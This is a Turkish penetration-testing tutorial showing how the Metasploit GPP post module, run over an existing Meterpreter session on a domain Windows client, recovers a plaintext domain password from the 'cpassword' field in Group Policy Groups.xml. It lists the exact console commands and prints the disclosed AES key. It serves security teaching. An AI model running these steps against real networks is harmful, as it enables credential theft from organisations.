Meterpreter Bağlantısı Elde Edilmiş Olan Windows Bilgisayarda MSF gpp Post Modülü ile Grup İlkelerindeki Erişim Bilgilerinin Elde Edilmesi

Sızma testleri sırasında Meterpreter ile bağlantı kurulabilmiş olan bir bilgisayarda kritik bilgi elde edilmeye çalışılır. Etki alanlarında işletim sistemi üzerinde parolaların ayarlanması için Group Policy Preferences kullanılabilir. Bu yazıda, Meterpreter erişimi elde edilmiş bir Windows istemci üzerinden etki alanındaki grup ilkelerinin birisinde kayıtlı olan erişim bilgileri, MSF gpp post modülü ile elde edilecektir.

Etki alanı denetleyicisinde bir grup ilkesi ile cevat.yakupgil adlı hesabın parolasının yapılandırıldığı görülmektedir.

acquiring-sensitive-logon-informations-on-group-policy-by-using-msf-gpp-post-module-01

Varsayılan durumda, etki alanındaki herhangi bir istemci bilgisayarda, etki alanı hesabı ile bu parolanın şifrelenmiş/karıştırılmış haline Groups.xml dosyasından erişim sağlanabilir. Parolanın bu halinin Groups.xml dosyasındaki “cpassword” değişkenine atanmış olduğu görülmektedir.

acquiring-sensitive-logon-informations-on-group-policy-by-using-msf-gpp-post-module-02

W7 adlı etki alanındaki bir bilgisayarda SYSTEM hakları ile Meterpreter bağlantısının elde edildiği görülmektedir. MSF gpp post modülü ile grup ilkesindeki “cpassword” değerine atanan parolanın açık halinin elde edilmesi için modül seçilir ve seçenekleri incelenir.

sessions
search gpp type:post
use post/windows/gather/credentials/gpp
show options

acquiring-sensitive-logon-informations-on-group-policy-by-using-msf-gpp-post-module-03

Modüle oturum ID değeri verilerek modül çalışıtırılır ve grup ilkesinde kayıtlı olan kimlik bilgileri ele geçirilir.

set SESSION 1
show options
run

acquiring-sensitive-logon-informations-on-group-policy-by-using-msf-gpp-post-module-04

Böylece, cevat.yakupgil hesabının parolasının açık hali elde edilmiş ve ilgili Groups.xml dosyasının içeriği kaydedilmiştir.

run

acquiring-sensitive-logon-informations-on-group-policy-by-using-msf-gpp-post-module-05

 

AES ile şifrelenen bu verinin çözülebilmesinin sebebi simetrik şifreleme parolasının Microsoft tarafında ifşa edilmiş olmasıdır. Bu parola aşağıdaki gibidir:

4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8
f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b

 

Groups.xml dosyası /root/.msf/loot dizinine kaydedilmiş olduğu görülmektedir.

acquiring-sensitive-logon-informations-on-group-policy-by-using-msf-gpp-post-module-06

 

 

Kaynak:

Group Policy Preferences

 

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.